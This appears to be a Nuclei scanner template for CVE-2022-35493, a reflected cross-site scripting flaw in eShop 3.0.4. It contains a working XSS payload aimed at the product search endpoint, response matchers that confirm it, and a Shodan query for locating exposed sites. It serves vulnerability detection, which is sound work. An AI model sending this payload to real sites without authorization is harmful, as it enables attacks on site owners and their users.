49 lines
1.7 KiB
YAML
49 lines
1.7 KiB
YAML
id: CVE-2022-35493
|
|
|
|
info:
|
|
name: eShop 3.0.4 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
|
|
remediation: |
|
|
To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
|
|
reference:
|
|
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-35493
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00133
|
|
epss-percentile: 0.48041
|
|
cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wrteam
|
|
product: eshop_-_ecommerce_\/_store_website
|
|
shodan-query: http.html:"eShop - Multipurpose Ecommerce"
|
|
tags: cve,cve2022,eshop,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a004830460221008b57c36a17b6f8e2942a8862ebd480f2a7e99086dc550b2051deac90a3181fd3022100c08f5d7f291d963f156939c6e78da8680bf89abfdacc1a1cb20a75e231c375a8:922c64590222798bb761d5b6d8e72950 |